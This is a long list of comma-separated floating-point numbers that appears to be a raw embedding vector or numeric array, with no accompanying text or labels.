-0.002219771733507514, 0.02785995416343212, -0.01832585409283638, -0.006044329144060612, 0.006317251827567816, 0.05758306384086609, -0.008391465060412884, -0.024526657536625862, -0.005589458160102367, 0.0162880290299654, -0.0002107191103277728, -0.010007167235016823, 0.008791751228272915, -0.003362408373504877, -0.015167227014899254, 0.0024235539603978395, 0.026651816442608833, 0.017175938934087753, 0.00919203832745552, -0.04494855925440788, -0.010684016160666943, -0.00782378576695919, -0.0007350719533860683, -0.03449743613600731, 0.007248828187584877, -0.02228505350649357, -0.029577547684311867, -0.009716049768030643, -0.03388608992099762, -0.008842697367072105, 0.04820907488465309, -0.020509235560894012, -0.00312951416708529, 0.0009534101700410247, -0.011739317327737808, -0.02992689050734043, 0.010138170793652534, 0.015764018520712852, -0.004574185237288475, 0.012758228927850723, -0.008355075493454933, 0.01189943216741085, 0.0009333958150818944, 0.00474157789722085, 0.005149142816662788, -0.005269228480756283, 0.013165793381631374, 0.02168826200067997, -0.022576170042157173, 0.03446832299232483, 0.02363874949514866, 0.04876219853758812, -0.03592391312122345, 0.035516347736120224, 0.010305562987923622, 0.01360247004777193, -0.010596680454909801, 0.02576390840113163, -0.01016000472009182, 0.006521034520119429, 0.008682582527399063, 0.018718861043453217, -0.004330374300479889, -0.004788884427398443, -0.011098858900368214, 0.011979489587247372, 0.00043576667667366564, 0.02034912072122097, -0.01451949030160904, 0.009323040954768658, 0.019228316843509674, -0.035632792860269547, -0.00981794111430645, -0.011746595613658428, -0.02381342090666294, -0.010778629221022129, -0.011266251094639301, -0.017423389479517937, -0.010167282074689865, 0.009417654946446419, -0.010560290887951851, 0.01823851838707924, -0.02640436589717865, -0.0105239013209939, 0.023245740681886673, -0.018136626109480858, -0.014679605141282082, 0.0392717644572258, -0.05077090859413147, 0.0022598004434257746, -0.012539890594780445, -0.013209461234509945, 0.02572024054825306, -0.028311187401413918, -0.010909631848335266, -0.04069824144244194, -0.011775706894695759, -0.013638859614729881, 0.03167359530925751, -0.015880465507507324, -0.0021196999587118626, 0.01900997944176197, 0.0447738878428936, -0.0243956558406353, -0.011084302328526974, -0.02505066990852356, 0.01490522176027298, -0.0022907317616045475, 0.0122342174872756, 0.008566135540604591, 0.0008524287259206176, 0.013085735961794853, -0.016448143869638443, 0.014119204133749008, 0.015021668747067451, 0.02177559584379196, 0.00008545893797418103, -0.005476649850606918, 0.0003718572552315891, 0.027292275801301003, 0.03819463029503822, -0.05551612749695778, -0.00659381365403533, 0.020742129534482956, -0.012437999248504639, 0.021499035879969597, -0.005669515114277601, -0.010989689268171787, -0.007801951840519905, -0.0017521640984341502, -0.010662182234227657, 0.028005514293909073, -0.059271544218063354, 0.02583668753504753, -0.011339030228555202, 0.005818712990731001, -0.0012527154758572578, 0.026011357083916664, -0.026913821697235107, -0.0023780670017004013, -0.03720482811331749, 0.028776975348591805, 0.01624436303973198, -0.04748127982020378, 0.004752494860440493, 0.012467111460864544, -0.04419165104627609, 0.017394276335835457, -0.04494855925440788, -0.03248872607946396, -0.03176093101501465, 0.03394431248307228, -0.036942824721336365, -0.058631084859371185, -0.006764845456928015, 0.057874180376529694, -0.0196358822286129, -0.001620251452550292, 0.003342394018545747, -0.02442476712167263, 0.029592104256153107, -0.01392997708171606, 0.010312841273844242, 0.019330209121108055, -0.0024708607234060764, 0.02989777736365795, 0.0028020069003105164, 0.0012490764493122697, 0.014468545094132423, 0.005127308890223503, 0.025938577950000763, -0.01909731514751911, -0.0037299443501979113, 0.012576280161738396, 0.03245961293578148, 0.025865798816084862, 0.00852974597364664, 0.016098802909255028, -0.06311429291963577, 0.03947554528713226, 0.00911925919353962, -0.0024417489767074585, 0.013682527467608452, 0.0016066052485257387, 0.053245410323143005, 0.0182967409491539, -0.029330099001526833, 0.014046424068510532, 0.04666615277528763, -0.03641881048679352, -0.013012956827878952, -0.004024700727313757, -0.005025417543947697, -0.01147731114178896, 0.020159894600510597, -0.03705926984548569, -0.02107691392302513, -0.02503611333668232, -0.02705938182771206, 0.014868831261992455, -0.00574229471385479, 0.025312675163149834, -0.0032496002968400717, 0.03647703677415848, 0.04326007515192032, -0.03452654927968979, -0.024250095710158348, -0.03190648928284645, 0.033769641071558, -0.023260297253727913, 0.014628659933805466, 0.015036224387586117, 0.03441010043025017, 0.00035752879921346903, -0.00678304024040699, 0.008566135540604591, 0.015880465507507324, -0.00004267261101631448, 0.03184826672077179, 0.011127970181405544, -0.020756684243679047, 0.018835309892892838, 0.003391520120203495, -0.001444671070203185, 0.027496058493852615, 0.005156420636922121, 0.0037335832603275776, 0.0070195733569562435, 0.010589403100311756, -0.015240006148815155, -0.007911120541393757, 0.0043740421533584595, 0.009730606339871883, 0.010603958740830421, 0.01123713981360197, 0.018427744507789612, -0.011215305887162685, 0.00659381365403533, -0.020625682547688484, -0.03810729458928108, -0.004166620783507824, -0.0009734244667924941, -0.004053812474012375, 0.0162152498960495, -0.007612725254148245, 0.001283646677620709, 0.02024722844362259, -0.006819429807364941, 0.0013300435384735465, -0.0027456029783934355, 0.011040635406970978, -0.005986105650663376, 0.008093069307506084, -0.02314385026693344, 0.02358052507042885, 0.00577868428081274, 0.012423443607985973, -0.003995588980615139, 0.032110270112752914, 0.041658930480480194, 0.012772784568369389, -0.028718750923871994, 0.022532502189278603, 0.00978882983326912, 0.02436654269695282, -0.034148093312978745, -0.020669350400567055, 0.02433743141591549, -0.015298229642212391, 0.0019468489335849881, -0.024730440229177475, -0.01014544814825058, -0.006655676290392876, -0.06788862496614456, -0.007554501760751009, -0.04360941797494888, -0.0046760765835642815, 0.01768539473414421, 0.013769862242043018, 0.0053893146105110645, -0.02717582881450653, -0.0007878370233811438, -0.007281579077243805, 0.028209295123815536, -0.006295418366789818, 0.03199382498860359, -0.004454099107533693, -0.00213243649341166, -0.01820940524339676, -0.012408887967467308, -0.007721894420683384, -0.00882814172655344, -0.011208027601242065, 0.049227986484766006, -0.022183161228895187, -0.012241494841873646, 0.011324474588036537, 0.0105239013209939, -0.005960633046925068, -0.010603958740830421, -0.020800352096557617, 0.053216297179460526, -0.014068257994949818, 0.01630258560180664, -0.018660638481378555, 0.052488505840301514, -0.004330374300479889, 0.026011357083916664, -0.013216739520430565, -0.0015884104650467634, -0.00008494720532326028, -0.014723272994160652, 0.0037008326034992933, 0.020043447613716125, -0.01389358751475811, 0.018456855788826942, 0.0005194629775360227, 0.025647461414337158, 0.03612769395112991, 0.01157192513346672, 0.01451949030160904, 0.0014665048802271485, 0.004112035967409611, -0.034963224083185196, 0.004847107920795679, 0.015065335668623447, 0.017467055469751358, 0.004901692736893892, -0.02451210282742977, 0.007801951840519905, 0.013012956827878952, 0.0037445002235472202, 0.02704482525587082, 0.012969288975000381, 0.0005649501108564436, -0.008355075493454933, -0.016666483134031296, -0.00815129280090332, -0.02572024054825306, -0.006306334864348173, 0.005010861903429031, -0.017117714509367943, -0.020698461681604385, 0.006244472693651915, 0.0064118653535842896, -0.013624303974211216, 0.020145338028669357, 0.008915476500988007, -0.015109003521502018, -0.011957655660808086, -0.0380781814455986, 0.013347742147743702, 0.0035534542985260487, -0.016724705696105957, 0.01427204068750143, -0.015138115733861923, 0.0217901524156332, 0.024570325389504433, -0.00044918537605553865, -0.015152671374380589, -0.02976677566766739, 0.023245740681886673, -0.02301284670829773, -0.024235541000962257, -0.006542867980897427, 0.007390748243778944, 0.0081440145149827, -0.012467111460864544, -0.05277962237596512, 0.05484655499458313, 0.001275458955205977, 0.014694160781800747, 0.07429321110248566, -0.004392236936837435, 0.0008160390425473452, -0.01019639428704977, 0.013871753588318825, -0.0022306886967271566, -0.0006950433016754687, 0.028835197910666466, 0.038252852857112885, -0.03333296626806259, 0.021353475749492645, -0.04069824144244194, 0.00227799522690475, 0.01455587986856699, -0.013988200575113297, -0.02911175973713398, 0.009242983534932137, -0.021120581775903702, -0.05091647058725357, 0.020014334470033646, 0.0037772508803755045, -0.03371141850948334, -0.024905111640691757, 0.006561063230037689, 0.03117869608104229, 0.0014246568316593766, -0.017292385920882225, 0.006662954110652208, 0.00778011791408062, -0.01010905858129263, -0.04390053451061249, 0.010429288260638714, -0.01704493537545204, 0.016055135056376457, 0.01622980646789074, -0.002343496773391962, 0.010975133627653122, 0.013122126460075378, -0.043784089386463165, -0.037699729204177856, 0.01765628345310688, 0.005644042510539293, 0.03784528747200966, -0.007274301256984472, 0.026200585067272186, 0.05097469314932823, -0.005840546917170286, -0.006648398470133543, -0.002749241888523102, -0.05406053736805916, -0.003167723538354039, -0.010232783854007721, 0.006793957203626633, -0.0054220655001699924, -0.020145338028669357, 0.008056679740548134, -0.008362352848052979, -0.006706621963530779, 0.005218283273279667, -0.01909731514751911, 0.013740750961005688, -0.007368914317339659, 0.019461212679743767, -0.009628714993596077, -0.0175543911755085, 0.004566907417029142, -0.014963445253670216, 0.002660087076947093, 0.011761151254177094, -0.01772906258702278, 0.00540750939399004, 0.008391465060412884, -0.005713182967156172, 0.0038136406801640987, 0.00021322090469766408, -0.0017958317184820771, -0.02436654269695282, -0.018456855788826942, 0.020713018253445625, 0.0080712353810668, -0.008675304241478443, 0.043696753680706024, -0.020480124279856682, -0.037728842347860336, 0.03851485997438431, -0.00726338429376483, -0.016710150986909866, -0.015851354226469994, -0.020494678989052773, 0.007008656393736601, -0.0014128300826996565, -0.019883332774043083, -0.0004537340719252825, 0.025603793561458588, 0.0007728262571617961, -0.009344874881207943, 0.022154049947857857, -0.030218007043004036, -0.022023046389222145, 0.022183161228895187, -0.0203782320022583, 0.012321552261710167, -0.015487456694245338, -0.002618239028379321, 0.009577768854796886, -0.015531124547123909, 0.0021651871502399445, 0.01906820386648178, -0.032838065177202225, -0.029359210282564163, -0.014832441695034504, -0.01155736856162548, 0.026710040867328644, 0.017903732135891914, 0.011717483401298523, 0.010465677827596664, 0.02368241734802723, 0.01085868664085865, -0.03647703677415848, -0.011913987807929516, 0.015443788841366768, 0.0088135851547122, -0.008384186774492264, -0.016593704000115395, 0.008682582527399063, -0.00286932778544724, 0.02704482525587082, 0.013449633494019508, 0.010341952554881573, 0.005050890613347292, -0.008129458874464035, -0.040261562913656235, 0.017234161496162415, -0.01051662303507328, -0.00270375469699502, -0.019359320402145386, -0.012831008061766624, 0.014461266808211803, 0.013726195320487022, 0.011979489587247372, 0.018413187935948372, -0.04276517778635025, -0.025953134521842003, -0.019126426428556442, 0.02503611333668232, -0.019854221493005753, 0.010174560360610485, -0.010749517939984798, -0.0036426091101020575, -0.0037626950070261955, 0.003569829510524869, 0.0019231956684961915, -0.002829299308359623, 0.0065756188705563545, 0.014715994708240032, -0.015196339227259159, 0.01765628345310688, -0.02034912072122097, -0.0006763935671187937, -0.021382588893175125, -0.04017423093318939, -0.027335943654179573, 0.02113513834774494, -0.028005514293909073, -0.009002812206745148, 0.01423565112054348, 0.007751006167382002, -0.01486155390739441, -0.04686993360519409, 0.006484644487500191, -0.028311187401413918, 0.00884997472167015, 0.0250652264803648, -0.0019086397951468825, 0.0032732535619288683, -0.002429012442007661, 0.00019639066886156797, 0.010029001161456108, 0.013886310160160065, 0.005840546917170286, 0.02855863608419895, -0.026579037308692932, -0.01705949194729328, -0.030742019414901733, 0.006735733710229397, 0.011950377374887466, 0.00848607812076807, -0.008325963281095028, -0.001248166779987514, 0.01631714217364788, -0.005331091117113829, -0.021440811455249786, -0.0053893146105110645, -0.009563213214278221, -0.012700005434453487, 0.009039201773703098, -0.026768263429403305, 0.013442355208098888, -0.011069746688008308, 0.011295363306999207, 0.02362419292330742, -0.0139445336535573, 0.004384959116578102, 0.0020432816818356514, -0.0015338258817791939, -0.02637525461614132, -0.013682527467608452, 0.020683905109763145, -0.017205050215125084, -0.005181893240660429, -0.002843855181708932, -0.06259028613567352, 0.022663505747914314, -0.026025913655757904, -0.009141093119978905, 0.021528147161006927, 0.011943100020289421, 0.0026273364201188087, -0.009432210586965084, 0.02438109926879406, -0.0002062841085717082, -0.011986766941845417, -0.03205204755067825, 0.009577768854796886, -0.02914087288081646, 0.006615647580474615, -0.005163698457181454, -0.001368252793326974, -0.0542934313416481, -0.019533991813659668, -0.024584881961345673, -0.04882042109966278, -0.014548602513968945, -0.007074157707393169, 0.010946022346615791, -0.015036224387586117, 0.0114918677136302, 0.003053095890209079, 0.021295253187417984, 0.02778717502951622, 0.009919832460582256, 0.027234051376581192, 0.00015931866073515266, 0.01899542286992073, -0.012350664474070072, -0.01569123938679695, 0.017277829349040985, -0.015094447880983353, 0.043754976242780685, -0.0003852759546134621, -0.01975232921540737, 0.013362297788262367, -0.00348431384190917, -0.011251695454120636, -0.004843469243496656, -0.05356564000248909, -0.0043412912636995316, -0.018413187935948372, -0.0067430115304887295, -0.02096046693623066, 0.0011089760810136795, 0.015458344481885433, -0.016768373548984528, 0.0004512322775553912, -0.014679605141282082, 0.00004150700260652229, 0.00540750939399004, -0.00034342778963036835, 0.010502067394554615, 0.0258075762540102, -0.016812041401863098, 0.010371064767241478, 0.02710304968059063, -0.04139692336320877, 0.014686883427202702, -0.047772400081157684, -0.05269228667020798, 0.020742129534482956, 0.013435077853500843, 0.002645531203597784, -0.036855489015579224, -0.01360974833369255, 0.03458477184176445, 0.03863130509853363, 0.018049292266368866, -0.03638970106840134, -0.0189663115888834, -0.0070486851036548615, -0.006946793757379055, -0.015705794095993042, 0.016535479575395584, 0.0028165627736598253, -0.012248773127794266, 0.006087996996939182, 0.026244252920150757, 0.005822352133691311, -0.010953299701213837, 0.031440701335668564, 0.021993935108184814, 0.015298229642212391, -0.02717582881450653, -0.044337209314107895, -0.02850041352212429, -0.02093135565519333, -0.03330385312438011, 0.026855599135160446, 0.005680432077497244, 0.05289606750011444, -0.004723383113741875, 0.006670231930911541, 0.0008333241567015648, 0.014395765960216522, 0.023274851962924004, -0.02161548286676407, -0.007962066680192947, 0.025967691093683243, -0.008646192960441113, 0.02438109926879406, 0.015036224387586117, -0.03280895575881004, -0.009293929673731327, 0.026710040867328644, 0.030392678454518318, -0.01081501878798008, -0.00982521940022707, -0.02518167346715927, -0.0028966201934963465, -0.04739394411444664, 0.004348569083958864, 0.028209295123815536, 0.001329133752733469, -0.0030476374085992575, -0.019213762134313583, 0.04192093387246132, 0.011171638034284115, -0.00848607812076807, -0.023347631096839905, -0.019810553640127182, -0.004748855717480183, -0.006047968287020922, -0.0122342174872756, -0.026098692789673805, -0.036302365362644196, 0.01451949030160904, -0.0046469648368656635, -0.011077024973928928, -0.022241385653614998, 0.002401720266789198, 0.0014164691092446446, 0.017437944188714027, -0.005502122920006514, -0.027452390640974045, 0.01624436303973198, 0.0038354743737727404, -0.024017201736569405, -0.005491205956786871, -0.019941555336117744, -0.03522523120045662, 0.001290014828555286, -0.006790318060666323, 0.01818029396235943, 0.067539282143116, -0.0008920025429688394, 0.051906269043684006, -0.018718861043453217, -0.007554501760751009, 0.0020341842900961637, 0.002434470923617482, 0.01895175687968731, -0.01906820386648178, 0.03714660555124283, -0.01214688178151846, -0.01019639428704977, -0.01752527989447117, 0.004421348683536053, 0.02381342090666294, 0.007037768140435219, -0.0005303798825480044, -0.017394276335835457, 0.022852731868624687, 0.01627347432076931, -0.03665170818567276, 0.04468655213713646, 0.00422120513394475, 0.010349230840802193, -0.02905353717505932, -0.021368032321333885, -0.035632792860269547, -0.03994133695960045, -0.019286541268229485, 0.008398742415010929, -0.009890720248222351, -0.009599602781236172, 0.006459171883761883, 0.016113359481096268, 0.025909466668963432, -0.0035625516902655363, 0.025487346574664116, 0.00640822621062398, 0.0013773501850664616, 0.0005708634271286428, -0.0034897723235189915, -0.0183695200830698, -0.003255058778449893, -0.02986866608262062, 0.019999779760837555, 0.005625847727060318, 0.03636058792471886, -0.03237227723002434, 0.017277829349040985, -0.0016366267809644341, -0.0010434746509417892, 0.00640458706766367, 0.032750729471445084, -0.002021447755396366, -0.01182665303349495, 0.016491811722517014, 0.04014511778950691, -0.0020942273549735546, 0.0018631527200341225, 0.0028238408267498016, 0.015487456694245338, 0.009512268006801605, -0.005189171060919762, 0.013034790754318237, -0.017423389479517937, -0.012401609681546688, 0.00407928554341197, 0.03647703677415848, 0.01289650984108448, -0.05094558000564575, -0.01975232921540737, -0.001496526412665844, 0.008507912047207355, 0.028966201469302177, 0.004359486047178507, 0.0029857750050723553, -0.011681093834340572, 0.01048023346811533, -0.005101835820823908, 0.03484677895903587, -0.0028602303937077522, -0.015138115733861923, -0.005669515114277601, -0.009650548920035362, -0.005291062407195568, 0.022779952734708786, -0.025982245802879333, -0.014475822448730469, -0.03263428434729576, 0.009039201773703098, -0.030829355120658875, -0.013063902035355568, -0.012314274907112122, 0.003904614830389619, 0.007991177961230278, -0.023289408534765244, -0.0010152726899832487, -0.002812923863530159, 0.005716822110116482, -0.023405855521559715, -0.009570491500198841, 0.018864421173930168, -0.011535534635186195, 0.02710304968059063, 0.003680818248540163, -0.03114958293735981, -0.028675083070993423, 0.004799801390618086, -0.022881843149662018, -0.014730550348758698, 0.01322401687502861, -0.04957732930779457, 0.004617853090167046, -0.0052510336972773075, -0.013580636121332645, 0.011615592055022717, 0.003491591662168503, -0.03455565869808197, -0.03263428434729576, 0.0068521806970238686, -0.015895022079348564, -0.024250095710158348, -0.0037918067537248135, 0.03612769395112991, 0.044482771307229996, 0.025967691093683243, -0.01772906258702278, 0.001514721312560141, -0.014781496487557888, 0.007547223940491676, 0.00919931661337614, 0.009701494127511978, 0.004941721446812153, 0.011448199860751629, 0.02296917885541916, 0.01899542286992073, 0.009250261820852757, 0.008718972094357014, 0.006622925400733948, 0.006248111370950937, -0.010654903948307037, -0.03240139037370682, -0.0017994707450270653, 0.010414732620120049, -0.009970777668058872, 0.004173898603767157, 0.01560390368103981, -0.03324563056230545, 0.0055312346667051315, 0.0009743342525325716, 0.0004967194399796426, -0.013391410000622272, -0.00031818245770409703, 0.002934829331934452, 0.006670231930911541, -0.0005749572883360088, 0.0023234824184328318, -0.0006668412825092673, 0.017801841720938683, -0.004293984733521938, 0.02180470898747444, -0.010502067394554615, 0.009621436707675457, -0.007518112193793058, 0.008325963281095028, -0.009373987093567848, -0.004817996174097061, -0.01155736856162548, 0.00607708003371954, -0.015895022079348564, 0.04264872893691063, -0.002554557053372264, -0.017190493643283844, -0.015967801213264465, -0.007569057866930962, -0.01704493537545204, 0.010283729061484337, 0.03382786735892296, -0.012445277534425259, 0.01899542286992073, 0.009206593967974186, -0.004548712633550167, -0.002279814798384905, -0.004417709540575743, -0.013769862242043018, 0.007474444340914488, 0.007707338780164719, 0.015167227014899254, 0.017306940630078316, -0.03245961293578148, -0.021921155974268913, 0.0039337268099188805, -0.002993052825331688, 0.029621215537190437, 0.0018649721750989556, 0.007838341407477856, 0.0037335832603275776, -0.008973699994385242, 0.022139493376016617, 0.036215029656887054, -0.014155593700706959, 0.0197086613625288, -0.03315829485654831, -0.025909466668963432, 0.004661520477384329, 0.017991067841649055, 0.008544301614165306, 0.024817775934934616, -0.022678060457110405, 0.023609638214111328, -0.006823068950325251, 0.007277939934283495, -0.027350498363375664, -0.00541114853695035, -0.0061353035271167755, -0.006051606964319944, 0.018485967069864273, 0.0008847246062941849, 0.013842642307281494, 0.02033456414937973, -0.004876219667494297, -0.01215416006743908, -0.009475878439843655, 0.0007509924471378326, 0.028660528361797333, 0.0001567031431477517, 0.029679439961910248, -0.003451563185080886, -0.019330209121108055, 0.015079892240464687, 0.02783084288239479, 0.00023403126397170126, 0.016084248200058937, -0.005243755877017975, -0.05362386256456375, -0.02970855124294758, 0.0042321220971643925, -0.04360941797494888, -0.014242928475141525, -0.003477035788819194, -0.014148315414786339, 0.02107691392302513, -0.005804157350212336, -0.02167370542883873, -0.008791751228272915, -0.01831129752099514, 0.013646137900650501, -0.006564701907336712, -0.0004762501921504736, 0.013391410000622272, 0.005440260283648968, 0.0009852511575445533, 0.04739394411444664, 0.03181915357708931, 0.024075426161289215, 0.002922093030065298, -0.00726338429376483, -0.016011469066143036, 0.035603683441877365, -0.029985113069415092, 0.02972310781478882, 0.0037135689053684473, -0.0009597783791832626, -0.015079892240464687, -0.012539890594780445, 0.02641892246901989, 0.02235783264040947, 0.040902022272348404, 0.005847824737429619, -0.010240062139928341, 0.015036224387586117, 0.0011626508785411716, 0.009286651387810707, 0.007954788394272327, -0.0008674394921399653, -0.008507912047207355, 0.01288923155516386, 0.028835197910666466, -0.00945404451340437, 0.014766940847039223, 0.022721728309988976, -0.02296917885541916, -0.011586480773985386, 0.014446711167693138, 0.012881954200565815, 0.03467210754752159, 0.004243039060384035, -0.01969410665333271, -0.005269228480756283, 0.036855489015579224, 0.0023034680634737015, -0.049781110137701035, -0.01256900280714035, -0.03112047165632248, -0.0011371781583875418, 0.004283067770302296, 0.0014601367292925715, 0.027263164520263672, 0.002840216038748622, 0.024672217667102814, -0.0020123503636568785, 0.0004421348567120731, 0.010101781226694584, -0.00045396151836030185, -0.009170204401016235, 0.041804488748311996, -0.006397309247404337, -0.002399900695309043, 0.024060869589447975, -0.019170094281435013, 0.0044067925773561, 0.014752384275197983, -0.012030434794723988, 0.023216629400849342, 0.00877719558775425, 0.030188895761966705, -0.02644803375005722, -0.028922533616423607, -0.0010316480183973908, -0.018122071400284767, -0.006935876794159412, -0.01393725536763668, -0.0037918067537248135, 0.009468600153923035, -0.00005196904021431692, 0.004767050966620445, -0.01617158204317093, 0.02705938182771206, -0.0012327011208981276, -0.04523967579007149, 0.004727022256702185, 0.0031076804734766483, -0.024643104523420334, -0.00692495983093977, -0.0064373379573225975, 0.02310018241405487, 0.01905364729464054, -0.008602525107562542, 0.0007864724029786885, -0.001764900516718626, 0.027990957722067833, -0.00882814172655344, 0.0023762474302202463, 0.03458477184176445, -0.01828218623995781, 0.028675083070993423, 0.00725974515080452, -0.0030749295838177204, -0.015400120988488197, 0.00018342683324590325, 0.035545460879802704, -0.03123691864311695, -0.011426365934312344, -0.008245905861258507, -0.0039264485239982605, 0.0017494348576292396, 0.016651926562190056, -0.01053117960691452, -0.013500578701496124, -0.0058296299539506435, 0.006539229303598404, -0.0011617412092164159, -0.0006677510100416839, -0.026855599135160446, -0.0006340905092656612, -0.008959144353866577, -0.017860064283013344, 0.005545790307223797, -0.015371009707450867, -0.00028270247275941074, -0.009577768854796886, 0.02765617147088051, -0.0007623642450198531, 0.024817775934934616, -0.014752384275197983, -0.010502067394554615, -0.012081380933523178, 0.014919777400791645, -0.004323096480220556, 0.028151072561740875, 0.01765628345310688, -0.002263439353555441, 0.004796162713319063, -0.004494127817451954, 0.0014210178051143885, -0.012590836733579636, 0.0004671527713071555, -0.014497656375169754, -0.020611125975847244, 0.03726305440068245, 0.00986160896718502, -0.012736395001411438, -0.008507912047207355, 0.0056949881836771965, 0.013617025688290596, 0.01567668281495571, 0.013631582260131836, 0.0032059326767921448, -0.025283563882112503, 0.00320411310531199, 0.011426365934312344, -0.030771130695939064, -0.0217901524156332, 0.004293984733521938, -0.022736284881830215, 0.022008491680026054, -0.004854386206716299, -0.022692617028951645, 0.011462755501270294, -0.0055967359803617, -0.050508905202150345, 0.0074890004470944405, 0.003165903966873884, -0.006892209406942129, 0.02174648456275463, 0.017903732135891914, -0.009934388101100922, -0.004337652120739222, 0.015836797654628754, -0.002130616921931505, -0.027481501922011375, 0.0557781346142292, 0.0020869493018835783, 0.009373987093567848, 0.01767083816230297, 0.000003944586751458701, 0.04404609277844429, 0.024715883657336235, -0.015050780028104782, 0.012576280161738396, -0.01825307309627533, -0.00407928554341197, 0.009381264448165894, 0.0108222970739007, 0.018602414056658745, -0.016651926562190056, -0.006957710720598698, -0.009403098374605179, 0.0176999494433403, 0.014774218201637268, -0.0026546285953372717, 0.0035607321187853813, -0.006430060137063265, 0.0020869493018835783, 0.021237028762698174, -0.0016257098177447915, -0.04192093387246132, -0.056651484221220016, 0.0013937255134806037, -0.0009379445109516382, 0.019301097840070724, -0.0015156309818848968, -0.0006027044146321714, -0.028616860508918762, 0.018034735694527626, 0.021892044693231583, 0.0365934818983078, -0.0055821798741817474, 0.004141147714108229, -0.009497711434960365, 0.003751778043806553, 0.012401609681546688, -0.0021852015051990747, -0.003999228123575449, -0.024526657536625862, 0.058660198003053665, -0.003255058778449893, -0.001070766942575574, 0.028849754482507706, -0.0015074433758854866, 0.009403098374605179, 0.004392236936837435, 0.003114958293735981, -0.023536859080195427, -0.011717483401298523, -0.026200585067272186, -0.0005863290280103683, 0.006189887877553701, 0.01390086580067873, 0.004101119469851255, 0.01181937474757433, -0.00372448586858809, -0.0035207034088671207, -0.017219606786966324, -0.010611237026751041, 0.012256051413714886, 0.010684016160666943, 0.009956222027540207, 0.016375364735722542, 0.04264872893691063, -0.022154049947857857, -0.006422782316803932, -0.01975232921540737, -0.005604013800621033, -0.015967801213264465, 0.007408943027257919, 0.013012956827878952, 0.014781496487557888, -0.014381209388375282, 0.009286651387810707, 0.031440701335668564, -0.018456855788826942, -0.04218294098973274, 0.027627060189843178, 0.010203671641647816, 0.013143959455192089, 0.006488283630460501, 0.000810125726275146, -0.0340607613325119, 0.002720130141824484, -0.0066083697602152824, -0.0015056238044053316, -0.015327341854572296, -0.015487456694245338, 0.0020469205919653177, 0.015938688069581985, -0.004173898603767157, 0.045792799443006516, 0.004279428627341986, 0.017248718068003654, 0.010873242281377316, 0.015764018520712852, -0.025196228176355362, 0.0003620775241870433, 0.03193560242652893, 0.014679605141282082, -0.010436566546559334, 0.012175993993878365, 0.011069746688008308, -0.007721894420683384, 0.006215360946953297, -0.015007112175226212, 0.03609858453273773, 0.0005949715850874782, 0.01691393367946148, 0.011135248467326164, 0.027379611507058144, -0.016506368294358253, -0.020043447613716125, -0.024133648723363876, 0.002310745883733034, -0.011317197233438492, -0.003144070040434599, -0.0018667916301637888, -0.00379544566385448, 0.01692848838865757, -0.024279208853840828, -0.008333241567015648, 0.025385454297065735, -0.013835364021360874, 0.008100347593426704, -0.008267739787697792, 0.0002651899412740022, 0.017437944188714027, 0.00031545321689918637, 0.02842763438820839, 0.017467055469751358, 0.011644704267382622, 0.01975232921540737, -0.017961956560611725, 0.004257595166563988, -0.012103213928639889, 0.006917682010680437, 0.004028339870274067, 0.01489066518843174, -0.00607344089075923, 0.0016193416668102145, 0.0024271931033581495, -0.006244472693651915, -0.008922754786908627, -0.005054529290646315, -0.0019286541501060128, -0.0018558746669441462, -0.011695649474859238, 0.022590726613998413, 0.01326040644198656, 0.005509400740265846, 0.013384131714701653, 0.009796107187867165, -0.0026728236116468906, 0.00441043172031641, -0.009111980907619, -0.004312179517000914, -0.012372498400509357, 0.03245961293578148, -0.02314385026693344, 0.016375364735722542, -0.017932845279574394, 0.006237194873392582, 0.015007112175226212, -0.00033342064125463367, -0.004141147714108229, -0.005331091117113829, -0.02314385026693344, 0.04008689522743225, -0.013784418813884258, 0.02173192985355854, -0.006058885250240564, 0.0008656199788674712, 0.010261895135045052, -0.025938577950000763, -0.005796879064291716, 0.0013591552851721644, 0.00006874241807963699, -0.0014919777167961001, -0.004821635317057371, 0.002325301757082343, -0.020174449309706688, 0.0066047306172549725, 0.007168770767748356, 0.01705949194729328, 0.0202326737344265, 0.012612669728696346, 0.01531278621405363, -0.004941721446812153, -0.0077655622735619545, -0.0019213762134313583, 0.011047912761569023, 0.0217173732817173, 0.017816396430134773, 0.010647626593708992, 0.020174449309706688, 0.013718917034566402, -0.008638914674520493, 0.005800518207252026, -0.009614158421754837, 0.020582014694809914, -0.01185576431453228, 0.03129514306783676, 0.005025417543947697, -0.018456855788826942, 0.011470033787190914, 0.011884876526892185, -0.014665049500763416, 0.014417598955333233, 0.006535590160638094, -0.007714616600424051, 0.02857319265604019, -0.004774328786879778, 0.008173126727342606, -0.004668798763304949, 0.006007939577102661, -0.031062249094247818, -0.0020196284167468548, 0.004686993546783924, 0.006044329144060612, -0.001709406147710979, -0.01563301496207714, -0.0007723713642917573, 0.012394332326948643, -0.004832552280277014, 0.015793129801750183, -0.0031367922201752663, -0.013355020433664322, 0.0015083530452102423, -0.009068313054740429, -0.004479572176933289, -0.01634625345468521, -0.0023798863403499126, -0.0051163919270038605, 0.017889177426695824, -0.01705949194729328, -0.003955560270696878, -0.01976688578724861, 0.014679605141282082, -0.00729977386072278, 0.01705949194729328, 0.016622815281152725, -0.001564757083542645, -0.018747974187135696, -0.009111980907619, -0.034992337226867676, -0.02652081288397312, 0.009672382846474648, 0.004679715260863304, 0.01189215388149023, -0.0030585543718189, -0.03266339376568794, -0.014468545094132423, 0.01459954772144556, -0.0022743563167750835, -0.011542812921106815, -0.016564590856432915, 0.014803330413997173, 0.02561834827065468, -0.004301262553781271, 0.010800463147461414, 0.03266339376568794, 0.011411810293793678, 0.0073252469301223755, 0.0114918677136302, 0.016462700441479683, 0.001407371717505157, -0.022008491680026054, -0.006921321153640747, 0.006284501403570175, -0.007106908597052097, 0.02509433776140213, 0.005123669747263193, -0.0038864200469106436, -0.011535534635186195, 0.011732039041817188, 0.015109003521502018, -0.004319457337260246, 0.004621491767466068, 0.022896399721503258, 0.0030913050286471844, -0.002110602566972375, -0.013922699727118015, -0.0209750235080719, 0.012983845546841621, -0.024934222921729088, -0.015458344481885433, 0.006087996996939182, 0.01835496537387371, 0.019897887483239174, -0.004817996174097061, -0.004999944940209389, -0.010298285633325577, -0.012321552261710167, -0.031004024669528008, -0.0001104199982364662, -0.0016466339584439993, 0.026855599135160446, 0.0025490985717624426, 0.001004355726763606, -0.027525169774889946, -0.012372498400509357, -0.009803385473787785, 0.011608314700424671, 0.017481612041592598, -0.0038209185004234314, -0.022692617028951645, -0.017161382362246513, 0.014308430254459381, -0.024628549814224243, 0.005291062407195568, 0.014453989453613758, -0.005636764690279961, 0.016419032588601112, 0.0030694713350385427, 0.004272150807082653, 0.00040415310650132596, -0.023464078083634377, 0.008879086934030056, 0.0169575996696949, 